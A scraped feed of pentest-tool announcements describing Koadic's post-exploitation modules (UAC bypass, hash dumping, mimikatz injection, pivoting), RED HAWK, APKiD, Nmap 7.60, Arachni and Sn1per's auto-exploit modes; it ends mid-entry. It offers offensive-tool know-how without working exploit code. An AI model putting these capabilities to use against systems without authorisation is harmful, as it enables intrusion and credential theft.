Koadic – COM Command & Control Framework (JScript RAT)

Koadic, or COM Command & Control, is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript), with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.It is possible to serve payloads completely in memory from stage 0 to beyond, as well as use cryptographically secure communications over SSL and TLS (depending on what the victim OS has enabled).Koadic also attempts to be compatible with both Python 2 and Python 3.DemoHooks a zombieElevates integrity (UAC Bypass)Dumps SAM/SECURITY hive for passwordsScans local network for open SMBPivots to another machineStagersStagers hook target zombies and allow you to use implants. Module Description stager/js/mshta serves payloads in memory using MSHTA.exe HTML Applications stager/js/regsvr serves payloads in memory using regsvr32.exe COM+ scriptlets stager/js/rundll32_js serves payloads in memory using rundll32.exe stager/js/disk serves payloads using files on disk ImplantsImplants start jobs on zombies. Module Description implant/elevate/bypassuac_eventvwr Uses enigma0x3’s eventvwr.exe exploit to bypass UAC on Windows 7, 8, and 10. implant/elevate/bypassuac_sdclt Uses enigma0x3’s sdclt.exe exploit to bypass UAC on Windows 10. implant/fun/zombie Maxes volume and opens The Cranberries YouTube in a hidden window. implant/fun/voice Plays a message over text-to-speech. implant/gather/clipboard Retrieves the current content of the user clipboard. implant/gather/hashdump_sam Retrieves hashed passwords from the SAM hive. implant/gather/hashdump_dc Domain controller hashes from the NTDS.dit file. implant/inject/mimikatz_dynwrapx Injects a reflective-loaded DLL to run powerkatz.dll (using Dynamic Wrapper X). implant/inject/mimikatz_dotnet2js Injects a reflective-loaded DLL to run powerkatz.dll (@tirannido DotNetToJS). implant/inject/shellcode_excel Runs arbitrary shellcode payload (if Excel is installed). implant/manage/enable_rdesktop Enables remote desktop on the target. implant/manage/exec_cmd Run an arbitrary command on the target, and optionally receive the output. implant/pivot/stage_wmi Hook a zombie on another machine using WMI. implant/pivot/exec_psexec Run a command on another machine using psexec from sysinternals. implant/scan/tcp Uses HTTP to scan open TCP ports on the target zombie LAN. implant/utils/download_file Downloads a file from the target zombie. implant/utils/upload_file Uploads a file from the listening server to the target zombies. DisclaimerCode samples are provided for educational purposes. Adequate defenses can only be built by researching attack techniques available to malicious actors. Using this code against target systems without prior permission is illegal in most jurisdictions. The authors are not liable for any damages from misuse of this information or code.Creators@Aleph___Naught@The_Naterz@JennaMagius@zerosum0x0Contributors@vvalien1fbctfcclausArno0xdelirious-lettuceAcknowledgementsSpecial thanks to research done by the following individuals:@subTee@enigma0x3@tiraniddo@harmj0y@gentilkiwi@mattifestationclymb3rDownload Koadic

Link: http://feedproxy.google.com/~r/PentestTools/~3/4r9r5eiQR9E/koadic-com-command-control-framework.html

RED HAWK v2.0.0 – All in one tool for Information Gathering, Vulnerability Scanning and Crawling. A must have tool for all penetration testers

RED HAWK is An All In One Tool For Information Gathering, SQL Vulnerability Scannig and Crawling. Coded In PHP.Features:Basic Scan Site Title NEWIP AddressWeb Server Detection IMPROVEDCMS DetectionCloudflare Detectionrobots.txt ScannerWhois Lookup IMPROVEDGeo-IP LookupGrab Banners IMPROVEDDNS LookupSubnet CalculatorNmap Port ScanSub-Domain Scanner IMPROVED Sub DomainIP AddressReverse IP Lookup & CMS Detection IMPROVED HostnameIP AddressCMSError Based SQLi ScannerBloggers View NEW HTTP Response CodeSite TitleAlexa RankingDomain AuthorityPage AuthoritySocial Links ExtractorLink GrabberWordPress Scan NEW Sensitive Files CrawlingVersion DetectionVersion Vulnerability ScannerCrawlerMX Lookup NEWScan For Everything – The Old Lame ScannerReleased Versions:- Version 1.0.0 [11-06-2017]- Version 1.1.0 [15-06-2017]- Version 2.0.0 [11-08-2017]Changelog:Version 1.0.0 Initial LaunchVersion 1.1.0 Updated The fix commandVersion 2.0.0 Separated all scans so that you are served the amount of information you needSub-Domain Scanner improvedfix command improvedWeb Server Detection ImprovedCMS Detection ImprovedBanner Grabbing ImprovedAdded WordPress ScannerAdded Bloggers ViewAdded MX LookupAdded Update optionRED HAWK Banner UpdatedMany Other Internal FixesInstallation:Run The Tool and Type fix This will Install All Required Modules.For The Bloggers View To Work Properly you have to configure RED HAWK with moz.com’s api keys for that follow the following steps:How To Configure RED HAWK with moz.com for Bloggers View ScanCreate an account in moz follow this link : https://moz.com/community/joinAfter successful account creation and completing the verification you need to generate the API KeysYou can get your API Keys here: https://moz.com/products/mozscape/accessGet your AccessID and SecretKey and replace the $accessID and $secretKey variable’s value in the config.php fileAll set, now you can enjoy the bloggers view.Usage:git clone https://github.com/Tuhinshubhra/RED_HAWKcd RED_HAWKphp rhawk.phpUse the “help" command to see the command list or type in the domain name you want to scan (without Http:// OR Https://).Select whether The Site Runs On HTTPS or not.Select the type of scan you want to performLeave the rest to the scannerList of CMS SupportedRED HAWK’s CMS Detector currently is able to detect the following CMSs (Content Management Systems) in case the website is using some other CMS, Detector will return could not detect.WordPressJoomlaDrupalMagentoVideo DemonstrationTODOsMake a proper update option ( Installs current version automatically )Add more CMS to the detectorImprove The WordPress Scanner ( Add User, Theme & Plugins Enumeration )Create a web version of the scannerAdd XSS & LFI ScannerImprove the Links grabber thingy under bloggers viewAdd some other scans under the Bloggers ViewDownload RED HAWK

Link: http://feedproxy.google.com/~r/PentestTools/~3/Bh6V5k5W1qg/red-hawk-v200-all-in-one-tool-for.html

APKiD – Android Application Identifier for Packers, Protectors, Obfuscators and Oddities

APKiD gives you information about how an APK was made. It identifies many compilers, packers, obfuscators, and other weird stuff. It’s PEiD for Android.For more information on what this tool can be used for, check out:Android Compiler FingerprintingDetecting Pirated and Malicious Android Apps with APKiDInstallingThe yara-python clone and compile steps here are temporarily necessary because we must point directly to our modified version of a Yara branch which includes our DEX Yara module. This step is nessecary until (if?) the original maintainers of Yara merge our module into the master branch. When this happens, we will undate the instructions here. After the yara-python fork is compiled, you can use pip to the most currently published APKiD package.git clone https://github.com/rednaga/yara-pythoncd yara-pythonpython setup.py installpip install apkidUsageusage: apkid [-h] [-j] [-t TIMEOUT] [-o DIR] [FILE [FILE …]]APKiD – Android Application Identifier v1.0.0positional arguments: FILE apk, dex, or directoryoptional arguments: -h, –help show this help message and exit -j, –json output results in JSON format -t TIMEOUT, –timeout TIMEOUT Yara scan timeout (in seconds) -o DIR, –output-dir DIR write individual JSON results to this directorySubmitting New Packers / Compilers / ObfuscatorsIf you come across an APK or DEX which APKiD does not recognize, please open a GitHub issue and tell us:what you think it isthe file hash (either MD5, SHA1, SHA256)We are open to any type of concept you might have for “something interesting" to detect, so do not limit yourself solely to packers, compilers or obfuscators. If there is an interesting anti disassembler, anti vm, anti* trick, please make an issue.You’re also welcome to submit pull requests. Just be sure to include a file hash so we can check the rule.HackingFirst you will need to install the specific version of yara-python the project depends on (more information about this in the Installing section):git clone https://github.com/rednaga/yara-pythoncd yara-pythonpython setup.py installThen, clone this repo, compile the rules, and install the package in editable mode:git clone https://github.com/rednaga/APKiDcd APKiD./prep-release.pypip install -e .[dev]If the above doesn’t work, due to permission errors dependent on your local machine and where Python has been installed, try specifying the –user flag. This is likely needed if you are working on OSX:pip install -e .[dev] –userDownload APKiD

Link: http://feedproxy.google.com/~r/PentestTools/~3/NC8uYVseoHI/apkid-android-application-identifier.html

Nmap 7.60 – Free Security Scanner For Network Exploration & Security Audits

Nmap (“Network Mapper") is a free and open source utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X. In addition to the classic command-line Nmap executable, the Nmap suite includes an advanced GUI and results viewer (Zenmap), a flexible data transfer, redirection, and debugging tool (Ncat), a utility for comparing scan results (Ndiff), and a packet generation and response analysis tool (Nping).Nmap was named “Security Product of the Year” by Linux Journal, Info World, LinuxQuestions.Org, and Codetalker Digest. It was even featured in twelve movies, including The Matrix Reloaded, Die Hard 4, Girl With the Dragon Tattoo, and The Bourne Ultimatum.FeaturesFlexible: Supports dozens of advanced techniques for mapping out networks filled with IP filters, firewalls, routers, and other obstacles. This includes many port scanning mechanisms (both TCP & UDP), OS detection, version detection, ping sweeps, and more. See the documentation page.Powerful: Nmap has been used to scan huge networks of literally hundreds of thousands of machines.Portable: Most operating systems are supported, including Linux, Microsoft Windows, FreeBSD, OpenBSD, Solaris, IRIX, Mac OS X, HP-UX, NetBSD, Sun OS, Amiga, and more.Easy: While Nmap offers a rich set of advanced features for power users, you can start out as simply as "nmap -v -A targethost". Both traditional command line and graphical (GUI) versions are available to suit your preference. Binaries are available for those who do not wish to compile Nmap from source.Free: The primary goals of the Nmap Project is to help make the Internet a little more secure and to provide administrators/auditors/hackers with an advanced tool for exploring their networks. Nmap is available for free download, and also comes with full source code that you may modify and redistribute under the terms of the license.Well Documented: Significant effort has been put into comprehensive and up-to-date man pages, whitepapers, tutorials, and even a whole book! Find them in multiple languages here.Supported: While Nmap comes with no warranty, it is well supported by a vibrant community of developers and users. Most of this interaction occurs on the Nmap mailing lists. Most bug reports and questions should be sent to the nmap-dev list, but only after you read the guidelines. We recommend that all users subscribe to the low-traffic nmap-hackers announcement list. You can also find Nmap on Facebook and Twitter. For real-time chat, join the #nmap channel on Freenode or EFNet.Acclaimed: Nmap has won numerous awards, including "Information Security Product of the Year" by Linux Journal, Info World and Codetalker Digest. It has been featured in hundreds of magazine articles, several movies, dozens of books, and one comic book series. Visit the press page for further details.Popular: Thousands of people download Nmap every day, and it is included with many operating systems (Redhat Linux, Debian Linux, Gentoo, FreeBSD, OpenBSD, etc). It is among the top ten (out of 30,000) programs at the Freshmeat.Net repository. This is important because it lends Nmap its vibrant development and user support communities.Changelog• [Windows] Updated the bundled Npcap from 0.91 to 0.93, fixing severalissues with installation and compatibility with the Windows 10 CreatorsUpdate.• [NSE][GH#910] NSE scripts now have complete SSH support via libssh2,including password brute-forcing and running remote commands, thanks to thecombined efforts of three Summer of Code students: [Devin Bjelland, SergeyKhegay, Evangelos Deirmentzoglou]• [NSE] Added 14 NSE scripts from 6 authors, bringing the total up to 579!They are all listed at https://nmap.org/nsedoc/, and the summaries arebelow: – ftp-syst sends SYST and STAT commands to FTP servers to get system version and connection information. [Daniel Miller] – [GH#916] http-vuln-cve2017-8917 checks for an SQL injection vulnerability affecting Joomla! 3.7.x before 3.7.1. [Wong Wai Tuck] – iec-identify probes for the IEC 60870-5-104 SCADA protocol. [Aleksandr Timorin, Daniel Miller] – [GH#915] openwebnet-discovery retrieves device identifying information and number of connected devices running on openwebnet protocol. [Rewanth Cool] – puppet-naivesigning checks for a misconfiguration in the Puppet CA where naive signing is enabled, allowing for any CSR to be automatically signed. [Wong Wai Tuck] – [GH#943] smb-protocols discovers if a server supports dialects NT LM 0.12 (SMBv1), 2.02, 2.10, 3.00, 3.02 and 3.11. This replaces the old smbv2-enabled script. [Paulino Calderon] – [GH#943] smb2-capabilities lists the supported capabilities of SMB2/SMB3 servers. [Paulino Calderon] – [GH#943] smb2-time determines the current date and boot date of SMB2 servers. [Paulino Calderon] – [GH#943] smb2-security-mode determines the message signing configuration of SMB2/SMB3 servers. [Paulino Calderon] – [GH#943] smb2-vuln-uptime attempts to discover missing critical patches in Microsoft Windows systems based on the SMB2 server uptime. [Paulino Calderon] – ssh-auth-methods lists the authentication methods offered by an SSH server. [Devin Bjelland] – ssh-brute performs brute-forcing of SSH password credentials. [Devin Bjelland] – ssh-publickey-acceptance checks public or private keys to see if they could be used to log in to a target. A list of known-compromised key pairs is included and checked by default. [Devin Bjelland] – ssh-run uses user-provided credentials to run commands on targets via SSH. [Devin Bjelland]• [NSE] Removed smbv2-enabled, which was incompatible with the new SMBv2/3improvements. It was fully replaced by the smb-protocols script.• [Ncat][GH#446] Added Datagram TLS (DTLS) support to Ncat in connect(client) mode with –udp –ssl. Also added Application Layer ProtocolNegotiation (ALPN) support with the –ssl-alpn option. [Denis Andzakovic,Daniel Miller]• Updated the default ciphers list for Ncat and the secure ciphers list forNsock to use "!aNULL:!eNULL" instead of "!ADH". With the addition of ECDHciphersuites, anonymous ECDH suites were being allowed. [Daniel Miller]• [NSE][GH#930] Fix ndmp-version and ndmp-fs-info when scanning VeritasBackup Exec Agent 15 or 16. [Andrew Orr]• [NSE][GH#943] Added new SMB2/3 library and related scripts. [PaulinoCalderon]• [NSE][GH#950] Added wildcard detection to dns-brute. Only hostnames thatresolve to unique addresses will be listed. [Aaron Heesakkers]• [NSE] FTP scripts like ftp-anon and ftp-brute now correctly handleTLS-protected FTP services and use STARTTLS when necessary. [Daniel Miller]• [NSE][GH#936] Function url.escape no longer encodes so-called"unreserved" characters, including hyphen, period, underscore, and tilde,as per RFC 3986. [nnposter]• [NSE][GH#935] Function http.pipeline_go no longer assumes that persistentconnections are supported on HTTP 1.0 target (unless the target explicitlydeclares otherwise), as per RFC 7230. [nnposter]• [NSE][GH#934] The HTTP response object has a new member, version, whichcontains the HTTP protocol version string returned by the server, e.g."1.0". [nnposter]• [NSE][GH#938] Fix handling of the objectSID Active Directory attribute byldap.lua. [Tom Sellers]• [NSE] Fix line endings in the list of Oracle SIDs used byoracle-sid-brute. Carriage Return characters were being sent in theconnection packets, likely resulting in failure of the script. [AnantShrivastava]• [NSE][GH#141] http-useragent-checker now checks for changes in HTTPstatus (usually 403 Forbidden) in addition to redirects to indicateforbidden User Agents. [Gyanendra Mishra]Download Nmap 7.60

Link: http://feedproxy.google.com/~r/PentestTools/~3/6A-OnRPPMdg/nmap-760-free-security-scanner-for.html

Arachni v1.5.1 – Web Application Security Scanner Framework

Arachni is a feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications.It is smart, it trains itself by monitoring and learning from the web application’s behavior during the scan process and is able to perform meta-analysis using a number of factors in order to correctly assess the trustworthiness of results and intelligently identify (or avoid) false-positives.Unlike other scanners, it takes into account the dynamic nature of web applications, can detect changes caused while travelling through the paths of a web application’s cyclomatic complexity and is able to adjust itself accordingly. This way, attack/input vectors that would otherwise be undetectable by non-humans can be handled seamlessly.Moreover, due to its integrated browser environment, it can also audit and inspect client-side code, as well as support highly complicated web applications which make heavy use of technologies such as JavaScript, HTML5, DOM manipulation and AJAX.Finally, it is versatile enough to cover a great deal of use cases, ranging from a simple command line scanner utility, to a global high performance grid of scanners, to a Ruby library allowing for scripted audits, to a multi-user multi-scan web collaboration platform.Note: Despite the fact that Arachni is mostly targeted towards web application security, it can easily be used for general purpose scraping, data-mining, etc. with the addition of custom components.Arachni offers:A stable, efficient, high-performance frameworkCheck, report and plugin developers are allowed to easily and quickly create and deploy their components with the minimum amount of restrictions imposed upon them, while provided with the necessary infrastructure to accomplish their goals.Furthermore, they are encouraged to take full advantage of the Ruby language under a unified framework that will increase their productivity without stifling them or complicating their tasks.Moreover, that same framework can be utilized as any other Ruby library and lead to the development of brand new scanners or help you create highly customized scan/audit scenarios and/or scripted scans.SimplicityAlthough some parts of the Framework are fairly complex you will never have to deal them directly. >From a user’s or a component developer’s point of view everything appears simple and straight-forward all the while providing power, performance and flexibility.From the simple command-line utility scanner to the intuitive and user-friendly Web interface and collaboration platform, Arachni follows the principle of least surprise and provides you with plenty of feedback and guidance.In simple termsArachni is designed to automatically detect security issues in web applications. All it expects is the URL of the target website and after a while it will present you with its findings.FeaturesGeneralCookie-jar/cookie-string support.Custom header support.SSL support with fine-grained options.User Agent spoofing.Proxy support for SOCKS4, SOCKS4A, SOCKS5, HTTP/1.1 and HTTP/1.0.Proxy authentication.Site authentication (SSL-based, form-based, Cookie-Jar, Basic-Digest, NTLMv1, Kerberos and others).Automatic log-out detection and re-login during the scan (when the initial login was performed via the autologin, login_script or proxy plugins).Custom 404 page detection.UI abstraction:Command-line Interface.Web User Interface.Pause/resume functionality.Hibernation support — Suspend to and restore from disk.High performance asynchronous HTTP requests.With adjustable concurrency.With the ability to auto-detect server health and adjust its concurrency automatically.Support for custom default input values, using pairs of patterns (to be matched against input names) and values to be used to fill in matching inputs.Integrated browser environmentArachni includes an integrated, real browser environment in order to provide sufficient coverage to modern web applications which make use of technologies such as HTML5, JavaScript, DOM manipulation, AJAX, etc.In addition to the monitoring of the vanilla DOM and JavaScript environments, Arachni’s browsers also hook into popular frameworks to make the logged data easier to digest:JQueryAngularJSMore to come…In essence, this turns Arachni into a DOM and JavaScript debugger, allowing it to monitor DOM events and JavaScript data and execution flows. As a result, not only can the system trigger and identify DOM-based issues, but it will accompany them with a great deal of information regarding the state of the page at the time.Relevant information include:Page DOM, as HTML code.With a list of DOM transitions required to restore the state of the page to the one at the time it was logged.Original DOM (i.e. prior to the action that caused the page to be logged), as HTML code.With a list of DOM transitions.Data-flow sinks — Each sink is a JS method which received a tainted argument.Parent object of the method (ex.: DOMWindow).Method signature (ex.: decodeURIComponent()).Arguments list.With the identified taint located recursively in the included objects.Method source code.JS stacktrace.Execution flow sinks — Each sink is a successfully executed JS payload, as injected by the security checks.Includes a JS stacktrace.JavaScript stack-traces include:Method names.Method locations.Method source codes.Argument lists.In essence, you have access to roughly the same information that your favorite debugger (for example, FireBug) would provide, as if you had set a breakpoint to take place at the right time for identifying an issue.Browser-clusterThe browser-cluster is what coordinates the browser analysis of resources and allows the system to perform operations which would normally be quite time consuming in a high-performance fashion.Configuration options include:Adjustable pool-size, i.e. the amount of browser workers to utilize.Timeout for each job.Worker TTL counted in jobs — Workers which exceed the TTL have their browser process respawned.Ability to disable loading images.Adjustable screen width and height.Can be used to analyze responsive and mobile applications.Ability to wait until certain elements appear in the page.Configurable local storage data.CoverageThe system can provide great coverage to modern web applications due to its integrated browser environment. This allows it to interact with complex applications that make heavy use of client-side code (like JavaScript) just like a human would.In addition to that, it also knows about which browser state changes the application has been programmed to handle and is able to trigger them programatically in order to provide coverage for a full set of possible scenarios.By inspecting all possible pages and their states (when using client-side code) Arachni is able to extract and audit the following elements and their inputs:FormsAlong with ones that require interaction via a real browser due to DOM events.User-interface FormsInput and button groups which don’t belong to an HTML

element but are instead associated via JS code.User-interface InputsOrphan <input> elements with associated DOM events.LinksAlong with ones that have client-side parameters in their fragment, i.e.: http://example.com/#/?param=val&param2=val2With support for rewrite rules.LinkTemplates — Allowing for extraction of arbitrary inputs from generic paths, based on user-supplied templates — useful when rewrite rules are not available.Along with ones that have client-side parameters in their URL fragments, i.e.: http://example.com/#/param/val/param2/val2CookiesHeadersGeneric client-side elements which have associated DOM events.AJAX-request parameters.JSON request data.XML request data.Open distributed architectureArachni is designed to fit into your workflow and easily integrate with your existing infrastructure.Depending on the level of control you require over the process, you can either choose the REST service or the custom RPC protocol.Both approaches allow you to:Remotely monitor and manage scans.Perform multiple scans at the same time — Each scan is compartmentalized to its own OS process to take advantage of:Multi-core/SMP architectures.OS-level scheduling/restrictions.Sandboxed failure propagation.Communicate over a secure channel.REST APIVery simple and straightforward API.Easy interoperability with non-Ruby systems.Operates over HTTP.Uses JSON to format messages.Stateful scan monitoring.Unique sessions automatically only receive updates when polling for progress, rather than full data.RPC APIHigh-performance/low-bandwidth communication protocol.MessagePack serialization for performance, efficiency and ease of integration with 3rd party systems.Grid:Self-healing.Scale up/down by hot-plugging/hot-unplugging nodes.Can scale up infinitely by adding nodes to increase scan capacity.(Always-on) Load-balancing — All Instances are automatically provided by the least burdened Grid member.With optional per-scan opt-out/override.(Optional) High-Performance mode — Combines the resources of multiple nodes to perform multi-Instance scans.Enabled on a per-scan basis.Scope configurationFilters for redundant pages like galleries, catalogs, etc. based on regular expressions and counters.Can optionally detect and ignore redundant pages automatically.URL exclusion filters using regular expressions.Page exclusion filters based on content, using regular expressions.URL inclusion filters using regular expressions.Can be forced to only follow HTTPS paths and not downgrade to HTTP.Can optionally follow subdomains.Adjustable page count limit.Adjustable redirect limit.Adjustable directory depth limit.Adjustable DOM depth limit.Adjustment using URL-rewrite rules.Can read paths from multiple user supplied files (to both restrict and extend the scope).AuditCan audit:FormsCan automatically refresh nonce tokens.Can submit them via the integrated browser environment.User-interface FormsInput and button groups which don’t belong to an HTML <form> element but are instead associated via JS code.User-interface InputsOrphan <input> elements with associated DOM events.LinksCan load them via the integrated browser environment.LinkTemplatesCan load them via the integrated browser environment.CookiesCan load them via the integrated browser environment.HeadersGeneric client-side DOM elements.JSON request data.XML request data.Can ignore binary/non-text pages.Can audit elements using both GET and POST HTTP methods.Can inject both raw and HTTP encoded payloads.Can submit all links and forms of the page along with the cookie permutations to provide extensive cookie-audit coverage.Can exclude specific input vectors by name.Can include specific input vectors by name.ComponentsArachni is a highly modular system, employing several components of distinct types to perform its duties.In addition to enabling or disabling the bundled components so as to adjust the system’s behavior and features as needed, functionality can be extended via the addition of user-created components to suit almost every need.Platform fingerprintersIn order to make efficient use of the available bandwidth, Arachni performs rudimentary platform fingerprinting and tailors the audit process to the server-side deployed technologies by only using applicable payloads.Currently, the following platforms can be identified:Operating systemsBSDLinuxUnixWindowsSolarisWeb serversApacheIISNginxTomcatJettyGunicornProgramming languagesPHPASPASPXJavaPythonRubyFrameworksRackCakePHPRailsDjangoASP.NET MVCJSFCherryPyNetteSymfonyThe user also has the option of specifying extra platforms (like a DB server) in order to help the system be as efficient as possible. Alternatively, fingerprinting can be disabled altogether.Finally, Arachni will always err on the side of caution and send all available payloads when it fails to identify specific platforms.ChecksChecks are system components which perform security checks and log issues.ActiveActive checks engage the web application via its inputs.SQL injection (sql_injection) — Error based detection.OracleInterBasePostgreSQLMySQLMSSQLEMCSQLiteDB2InformixFirebirdSaP Max DBSybaseFrontbaseIngresHSQLDBMS AccessBlind SQL injection using differential analysis (sql_injection_differential).Blind SQL injection using timing attacks (sql_injection_timing).MySQLPostgreSQLMSSQLNoSQL injection (no_sql_injection) — Error based vulnerability detection.MongoDBBlind NoSQL injection using differential analysis (no_sql_injection_differential).CSRF detection (csrf).Code injection (code_injection).PHPRubyPythonJavaASPBlind code injection using timing attacks (code_injection_timing).PHPRubyPythonJavaASPLDAP injection (ldap_injection).Path traversal (path_traversal).*nixWindowsJavaFile inclusion (file_inclusion).*nixWindowsJavaPHPPerlResponse splitting (response_splitting).OS command injection (os_cmd_injection).*nix*BSDIBM AIXWindowsBlind OS command injection using timing attacks (os_cmd_injection_timing).Linux*BSDSolarisWindowsRemote file inclusion (rfi).Unvalidated redirects (unvalidated_redirect).Unvalidated DOM redirects (unvalidated_redirect_dom).XPath injection (xpath_injection).GenericPHPJavadotNETlibXML2XSS (xss).Path XSS (xss_path).XSS in event attributes of HTML elements (xss_event).XSS in HTML tags (xss_tag).XSS in script context (xss_script_context).DOM XSS (xss_dom).DOM XSS script context (xss_dom_script_context).Source code disclosure (source_code_disclosure)XML External Entity (xxe).Linux*BSDSolarisWindowsPassivePassive checks look for the existence of files, folders and signatures.Allowed HTTP methods (allowed_methods).Back-up files (backup_files).Backup directories (backup_directories)Common administration interfaces (common_admin_interfaces).Common directories (common_directories).Common files (common_files).HTTP PUT (http_put).Insufficient Transport Layer Protection for password forms (unencrypted_password_form).WebDAV detection (webdav).HTTP TRACE detection (xst).Credit Card number disclosure (credit_card).CVS/SVN user disclosure (cvs_svn_users).Private IP address disclosure (private_ip).Common backdoors (backdoors)..htaccess LIMIT misconfiguration (htaccess_limit).Interesting responses (interesting_responses).HTML object grepper (html_objects).E-mail address disclosure (emails).US Social Security Number disclosure (ssn).Forceful directory listing (directory_listing).Mixed Resource/Scripting (mixed_resource).Insecure cookies (insecure_cookies).HttpOnly cookies (http_only_cookies).Auto-complete for password form fields (password_autocomplete).Origin Spoof Access Restriction Bypass (origin_spoof_access_restriction_bypass)Form-based upload (form_upload)localstart.asp (localstart_asp)Cookie set for parent domain (cookie_set_for_parent_domain)Missing Strict-Transport-Security headers for HTTPS sites (hsts).Missing X-Frame-Options headers (x_frame_options).Insecure CORS policy (insecure_cors_policy).Insecure cross-domain policy (allow-access-from) (insecure_cross_domain_policy_access)Insecure cross-domain policy (allow-http-request-headers-from) (insecure_cross_domain_policy_headers)Insecure client-access policy (insecure_client_access_policy)ReportersStandard outputHTML (zip) (html).XML (xml).Text (text).JSON (json)Marshal (marshal)YAML (yaml)AFR (afr)The default Arachni Framework Report format.PluginsPlugins add extra functionality to the system in a modular fashion, this way the core remains lean and makes it easy for anyone to add arbitrary functionality.Passive Proxy (proxy) — Analyzes requests and responses between the web app and the browser assisting in AJAX audits, logging-in and/or restricting the scope of the audit.Form based login (autologin).Script based login (login_script).Dictionary attacker for HTTP Auth (http_dicattack).Dictionary attacker for form based authentication (form_dicattack).Cookie collector (cookie_collector) — Keeps track of cookies while establishing a timeline of changes.WAF (Web Application Firewall) Detector (waf_detector) — Establishes a baseline of normal behavior and uses rDiff analysis to determine if malicious inputs cause any behavioral changes.BeepNotify (beep_notify) — Beeps when the scan finishes.EmailNotify (email_notify) — Sends a notification (and optionally a report) over SMTP at the end of the scan.VectorFeed (vector_feed) — Reads in vector data from which it creates elements to be audited. Can be used to perform extremely specialized/narrow audits on a per vector/element basis. Useful for unit-testing or a gazillion other things.Script (script) — Loads and runs an external Ruby script under the scope of a plugin, used for debugging and general hackery.Uncommon headers (uncommon_headers) — Logs uncommon headers.Content-types (content_types) — Logs content-types of server responses aiding in the identification of interesting (possibly leaked) files.Vector collector (vector_collector) — Collects information about all seen input vectors which are within the scan scope.Headers collector (headers_collector) — Collects response headers based on specified criteria.Exec (exec) — Calls external executables at different scan stages.Metrics (metrics) — Captures metrics about multiple aspects of the scan and the web application.Restrict to DOM state (restrict_to_dom_state) — Restricts the audit to a single page’s DOM state, based on a URL fragment.Webhook notify (webhook_notify) — Sends a webhook payload over HTTP at the end of the scan.Rate limiter (rate_limiter) — Rate limits HTTP requests.Page dump (page_dump) — Dumps page data to disk as YAML.DefaultsDefault plugins will run for every scan and are placed under /plugins/defaults/.AutoThrottle (autothrottle) — Dynamically adjusts HTTP throughput during the scan for maximum bandwidth utilization.Healthmap (healthmap) — Generates sitemap showing the health of each crawled/audited URLMetaPlugins under /plugins/defaults/meta/ perform analysis on the scan results to determine trustworthiness or just add context information or general insights.TimingAttacks (timing_attacks) — Provides a notice for issues uncovered by timing attacks when the affected audited pages returned unusually high response times to begin with. It also points out the danger of DoS attacks against pages that perform heavy-duty processing.Discovery (discovery) — Performs anomaly detection on issues logged by discovery checks and warns of the possibility of false positives where applicable.Uniformity (uniformity) — Reports inputs that are uniformly vulnerable across a number of pages hinting to the lack of a central point of input sanitization.Trainer subsystemThe Trainer is what enables Arachni to learn from the scan it performs and incorporate that knowledge, on the fly, for the duration of the audit.Checks have the ability to individually force the Framework to learn from the HTTP responses they are going to induce.However, this is usually not required since Arachni is aware of which requests are more likely to uncover new elements or attack vectors and will adapt itself accordingly.Still, this can be an invaluable asset to Fuzzer checks.InstallationUsageRunning the specsYou can run rake spec to run all specs or you can run them selectively using the following:rake spec:core # for the core librariesrake spec:checks # for the checksrake spec:plugins # for the pluginsrake spec:reports # for the reportsrake spec:path_extractors # for the path extractorsPlease be warned, the core specs will require a beast of a machine due to the necessity to test the Grid/multi-Instance features of the system.Note: The check specs will take many hours to complete due to the timing-attack tests.Download Arachni

Link: http://feedproxy.google.com/~r/PentestTools/~3/p2YzuDr4F0s/arachni-v151-web-application-security.html

Sn1per – Automated PenTest Recon Scanner

Sn1per is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities.DEMO VIDEO:FEATURES:Automatically collects basic recon (ie. whois, ping, DNS, etc.)Automatically launches Google hacking queries against a target domainAutomatically enumerates open ports via NMap port scanningAutomatically brute forces sub-domains, gathers DNS info and checks for zone transfersAutomatically checks for sub-domain hijackingAutomatically runs targeted NMap scripts against open portsAutomatically runs targeted Metasploit scan and exploit modulesAutomatically scans all web applications for common vulnerabilitiesAutomatically brute forces ALL open servicesAutomatically test for anonymous FTP accessAutomatically runs WPScan, Arachni and Nikto for all web servicesAutomatically enumerates NFS sharesAutomatically test for anonymous LDAP accessAutomatically enumerate SSL/TLS ciphers, protocols and vulnerabilitiesAutomatically enumerate SNMP community strings, services and usersAutomatically list SMB users and shares, check for NULL sessions and exploit MS08-067Automatically exploit vulnerable JBoss, Java RMI and Tomcat serversAutomatically tests for open X11 serversAuto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat CredsPerforms high level enumeration of multiple hosts and subnetsAutomatically integrates with Metasploit Pro, MSFConsole and Zenmap for reportingAutomatically gathers screenshots of all web sitesCreate individual workspaces to store all scan outputKALI LINUX INSTALL:./install.shDOCKER INSTALL:Docker Install: https://github.com/menzow/sn1per-dockerDocker Build: https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/Example usage:$ docker pull menzo/sn1per-docker$ docker run –rm -ti menzo/sn1per-docker sniper menzo.ioUSAGE:sniper <report>sniper <target> stealth <report>sniper <CIDR> discoversniper <target> port <portnum> sniper <target> fullportonly <portnum>sniper <target> web <report>sniper <target> nobrute <report>sniper <targets.txt> airstrike <report>sniper <targets.txt> nuke <report>sniper lootMODES:REPORT: Outputs all results to text in the loot directory for later reference. To enable reporting, append ‘report’ to any sniper mode or command.STEALTH: Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blockingDISCOVER: Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.PORT: Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.FULLPORTONLY: Performs a full detailed port scan and saves results to XML.WEB: Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly.NOBRUTE: Launches a full scan against a target host/domain without brute forcing services.AIRSTRIKE: 